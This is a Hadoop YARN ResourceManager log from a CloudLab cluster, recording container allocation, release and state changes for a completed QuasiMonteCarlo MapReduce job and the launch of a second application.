2019-09-23 15:21:12,059 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0001_01_000018 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 2 containers, <memory:3072, vCores:2> used and <memory:62464, vCores:30> available, release resources=true
2019-09-23 15:21:12,059 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0001_000001 released container container_1569273478927_0001_01_000018 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=2 available=<memory:62464, vCores:30> used=<memory:3072, vCores:2> with event: FINISHED
2019-09-23 15:21:12,281 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: Updating application attempt appattempt_1569273478927_0001_000001 with final state: FINISHING, and exit status: -1000
2019-09-23 15:21:12,283 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569273478927_0001_000001 State change from RUNNING to FINAL_SAVING
2019-09-23 15:21:12,283 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: Updating application application_1569273478927_0001 with final state: FINISHING
2019-09-23 15:21:12,284 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569273478927_0001 State change from RUNNING to FINAL_SAVING
2019-09-23 15:21:12,285 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Updating info for app: application_1569273478927_0001
2019-09-23 15:21:12,285 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569273478927_0001_000001 State change from FINAL_SAVING to FINISHING
2019-09-23 15:21:12,285 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569273478927_0001 State change from FINAL_SAVING to FINISHING
2019-09-23 15:21:13,095 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000008 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:21:13,095 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0001_01_000008 in state: COMPLETED event:FINISHED
2019-09-23 15:21:13,095 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000008
2019-09-23 15:21:13,095 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0001_01_000008 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 1 containers, <memory:2048, vCores:1> used and <memory:63488, vCores:31> available, release resources=true
2019-09-23 15:21:13,095 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0001_000001 released container container_1569273478927_0001_01_000008 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=1 available=<memory:63488, vCores:31> used=<memory:2048, vCores:1> with event: FINISHED
2019-09-23 15:21:13,290 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: application_1569273478927_0001 unregistered successfully. 
2019-09-23 15:21:19,113 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000001 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:21:19,113 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: Unregistering app attempt : appattempt_1569273478927_0001_000001
2019-09-23 15:21:19,113 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0001_01_000001 in state: COMPLETED event:FINISHED
2019-09-23 15:21:19,113 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000001
2019-09-23 15:21:19,113 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0001_01_000001 of capacity <memory:2048, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 0 containers, <memory:0, vCores:0> used and <memory:65536, vCores:32> available, release resources=true
2019-09-23 15:21:19,113 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0001_000001 released container container_1569273478927_0001_01_000001 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=0 available=<memory:65536, vCores:32> used=<memory:0, vCores:0> with event: FINISHED
2019-09-23 15:21:19,114 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Application finished, removing password for appattempt_1569273478927_0001_000001
2019-09-23 15:21:19,114 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569273478927_0001_000001 State change from FINISHING to FINISHED
2019-09-23 15:21:19,117 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569273478927_0001 State change from FINISHING to FINISHED
2019-09-23 15:21:19,118 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application appattempt_1569273478927_0001_000001 is done. finalState=FINISHED
2019-09-23 15:21:19,118 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.AppSchedulingInfo: Application application_1569273478927_0001 requests cleared
2019-09-23 15:21:19,118 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Cleaning master appattempt_1569273478927_0001_000001
2019-09-23 15:21:19,119 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=Application Finished - Succeeded	TARGET=RMAppManager	RESULT=SUCCESS	APPID=application_1569273478927_0001
2019-09-23 15:21:19,123 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAppManager$ApplicationSummary: appId=application_1569273478927_0001,name=QuasiMonteCarlo,user=F19_TIP,queue=root.F19_TIP,state=FINISHED,trackingUrl=http://master_hostname:8088/proxy/application_1569273478927_0001/,appMasterHost=cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us,startTime=1569273649596,finishTime=1569273672283,finalStatus=SUCCEEDED,memorySeconds=149701,vcoreSeconds=105,preemptedAMContainers=0,preemptedNonAMContainers=0,preemptedResources=<memory:0\, vCores:0>,applicationType=MAPREDUCE
2019-09-23 15:21:20,147 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Null container completed...
2019-09-23 15:21:20,147 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Null container completed...
2019-09-23 15:25:38,213 INFO org.apache.hadoop.yarn.server.resourcemanager.ClientRMService: Allocated new applicationId: 2
2019-09-23 15:25:38,663 INFO org.apache.hadoop.yarn.server.resourcemanager.ClientRMService: Application with id 2 submitted by user F19_TIP
2019-09-23 15:25:38,663 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: Storing application with id application_1569273478927_0002
2019-09-23 15:25:38,663 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	IP=128.110.153.96	OPERATION=Submit Application Request	TARGET=ClientRMService	RESULT=SUCCESS	APPID=application_1569273478927_0002
2019-09-23 15:25:38,663 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569273478927_0002 State change from NEW to NEW_SAVING
2019-09-23 15:25:38,663 INFO org.apache.hadoop.yarn.server.resourcemanager.recovery.RMStateStore: Storing info for app: application_1569273478927_0002
2019-09-23 15:25:38,665 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569273478927_0002 State change from NEW_SAVING to SUBMITTED
2019-09-23 15:25:38,665 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Accepted application application_1569273478927_0002 from user: F19_TIP, in queue: default, currently num of applications: 1
2019-09-23 15:25:38,666 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569273478927_0002 State change from SUBMITTED to ACCEPTED
2019-09-23 15:25:38,666 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: Registering app attempt : appattempt_1569273478927_0002_000001
2019-09-23 15:25:38,666 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569273478927_0002_000001 State change from NEW to SUBMITTED
2019-09-23 15:25:38,666 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Added Application Attempt appattempt_1569273478927_0002_000001 to scheduler from user: F19_TIP
2019-09-23 15:25:38,667 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569273478927_0002_000001 State change from SUBMITTED to SCHEDULED
2019-09-23 15:25:39,676 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000001 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:25:39,676 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000001
2019-09-23 15:25:39,676 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0002_01_000001 of capacity <memory:2048, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 1 containers, <memory:2048, vCores:1> used and <memory:63488, vCores:31> available after allocation
2019-09-23 15:25:39,678 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Sending NMToken for nodeId : cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 for container : container_1569273478927_0002_01_000001
2019-09-23 15:25:39,679 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000001 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:25:39,680 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Clear node set for appattempt_1569273478927_0002_000001
2019-09-23 15:25:39,680 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: Storing attempt: AppId: application_1569273478927_0002 AttemptId: appattempt_1569273478927_0002_000001 MasterContainer: Container: [ContainerId: container_1569273478927_0002_01_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:2048, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:40315 }, ]
2019-09-23 15:25:39,680 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569273478927_0002_000001 State change from SCHEDULED to ALLOCATED_SAVING
2019-09-23 15:25:39,680 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569273478927_0002_000001 State change from ALLOCATED_SAVING to ALLOCATED
2019-09-23 15:25:39,681 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Launching masterappattempt_1569273478927_0002_000001
2019-09-23 15:25:39,686 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Setting up container Container: [ContainerId: container_1569273478927_0002_01_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:2048, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:40315 }, ] for AM appattempt_1569273478927_0002_000001
2019-09-23 15:25:39,686 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Command to launch container container_1569273478927_0002_01_000001 : $JAVA_HOME/bin/java -Djava.io.tmpdir=$PWD/tmp -Dlog4j.configuration=container-log4j.properties -Dyarn.app.container.log.dir=<LOG_DIR> -Dyarn.app.container.log.filesize=0 -Dhadoop.root.logger=INFO,CLA -Dhadoop.root.logfile=syslog  -Xmx1024m org.apache.hadoop.mapreduce.v2.app.MRAppMaster 1><LOG_DIR>/stdout 2><LOG_DIR>/stderr 
2019-09-23 15:25:39,686 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Create AMRMToken for ApplicationAttempt: appattempt_1569273478927_0002_000001
2019-09-23 15:25:39,686 INFO org.apache.hadoop.yarn.server.resourcemanager.security.AMRMTokenSecretManager: Creating password for appattempt_1569273478927_0002_000001
2019-09-23 15:25:39,700 INFO org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Done launching container Container: [ContainerId: container_1569273478927_0002_01_000001, NodeId: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, NodeHttpAddress: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:8042, Resource: <memory:2048, vCores:1>, Priority: 0, Token: Token { kind: ContainerToken, service: 128.110.153.76:40315 }, ] for AM appattempt_1569273478927_0002_000001
2019-09-23 15:25:39,701 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569273478927_0002_000001 State change from ALLOCATED to LAUNCHED
2019-09-23 15:25:40,677 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000001 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:25:43,528 INFO SecurityLogger.org.apache.hadoop.ipc.Server: Auth successful for appattempt_1569273478927_0002_000001 (auth:SIMPLE)
2019-09-23 15:25:43,533 INFO org.apache.hadoop.yarn.server.resourcemanager.ApplicationMasterService: AM registration appattempt_1569273478927_0002_000001
2019-09-23 15:25:43,533 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	IP=128.110.153.76	OPERATION=Register App Master	TARGET=ApplicationMasterService	RESULT=SUCCESS	APPID=application_1569273478927_0002	APPATTEMPTID=appattempt_1569273478927_0002_000001
2019-09-23 15:25:43,533 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.attempt.RMAppAttemptImpl: appattempt_1569273478927_0002_000001 State change from LAUNCHED to RUNNING
2019-09-23 15:25:43,533 INFO org.apache.hadoop.yarn.server.resourcemanager.rmapp.RMAppImpl: application_1569273478927_0002 State change from ACCEPTED to RUNNING
2019-09-23 15:25:44,685 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000002 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:25:44,685 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000002
2019-09-23 15:25:44,685 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0002_01_000002 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 2 containers, <memory:3072, vCores:2> used and <memory:62464, vCores:30> available after allocation
2019-09-23 15:25:45,588 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Sending NMToken for nodeId : cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 for container : container_1569273478927_0002_01_000002
2019-09-23 15:25:45,589 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000002 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:25:45,686 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000003 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:25:45,686 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000003
2019-09-23 15:25:45,686 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0002_01_000003 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 3 containers, <memory:4096, vCores:3> used and <memory:61440, vCores:29> available after allocation
2019-09-23 15:25:46,608 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000003 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:25:46,687 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000002 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:25:46,688 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000003 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:25:46,689 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000004 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:25:46,689 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000004
2019-09-23 15:25:46,689 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0002_01_000004 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 4 containers, <memory:5120, vCores:4> used and <memory:60416, vCores:28> available after allocation
2019-09-23 15:25:47,616 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000004 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:25:47,689 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000004 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:25:47,690 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000005 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:25:47,690 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000005
2019-09-23 15:25:47,690 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0002_01_000005 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 5 containers, <memory:6144, vCores:5> used and <memory:59392, vCores:27> available after allocation
2019-09-23 15:25:48,220 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000006 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:25:48,220 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000006
2019-09-23 15:25:48,220 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0002_01_000006 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 6 containers, <memory:7168, vCores:6> used and <memory:58368, vCores:26> available after allocation
2019-09-23 15:25:48,625 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000005 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:25:48,627 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000006 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:25:49,222 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000005 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:25:49,222 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000006 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:25:49,222 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000002 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:25:49,222 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0002_01_000002 in state: COMPLETED event:FINISHED
2019-09-23 15:25:49,222 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000002
2019-09-23 15:25:49,222 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0002_01_000002 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 5 containers, <memory:6144, vCores:5> used and <memory:59392, vCores:27> available, release resources=true
2019-09-23 15:25:49,222 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0002_000001 released container container_1569273478927_0002_01_000002 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=5 available=<memory:59392, vCores:27> used=<memory:6144, vCores:5> with event: FINISHED
2019-09-23 15:25:49,224 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000007 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:25:49,224 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000007
2019-09-23 15:25:49,224 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0002_01_000007 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 6 containers, <memory:7168, vCores:6> used and <memory:58368, vCores:26> available after allocation
2019-09-23 15:25:49,275 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000008 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:25:49,275 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000008
2019-09-23 15:25:49,275 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0002_01_000008 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 7 containers, <memory:8192, vCores:7> used and <memory:57344, vCores:25> available after allocation
2019-09-23 15:25:49,635 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000007 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:25:49,637 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000008 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:25:50,277 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000007 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:25:50,277 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000008 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:25:50,277 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000003 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:25:50,277 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0002_01_000003 in state: COMPLETED event:FINISHED
2019-09-23 15:25:50,278 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000003
2019-09-23 15:25:50,278 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0002_01_000003 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 6 containers, <memory:7168, vCores:6> used and <memory:58368, vCores:26> available, release resources=true
2019-09-23 15:25:50,278 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0002_000001 released container container_1569273478927_0002_01_000003 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=6 available=<memory:58368, vCores:26> used=<memory:7168, vCores:6> with event: FINISHED
2019-09-23 15:25:50,278 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000009 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:25:50,278 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000009
2019-09-23 15:25:50,279 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0002_01_000009 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 7 containers, <memory:8192, vCores:7> used and <memory:57344, vCores:25> available after allocation
2019-09-23 15:25:50,541 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000010 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:25:50,542 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000010
2019-09-23 15:25:50,542 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0002_01_000010 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 8 containers, <memory:9216, vCores:8> used and <memory:56320, vCores:24> available after allocation
2019-09-23 15:25:50,649 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000009 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:25:50,651 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000010 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:25:51,542 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000009 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:25:51,542 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000010 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:25:51,542 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0002_01_000004 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:25:51,542 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0002_01_000004 in state: COMPLETED event:FINISHED
2019-09-23 15:25:51,542 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0002	CONTAINERID=container_1569273478927_0002_01_000004
2019-09-23 15:25:51,542 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0002_01_000004 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 7 containers, <memory:8192, vCores:7> used and <memory:57344, vCores:25> available, release resources=true
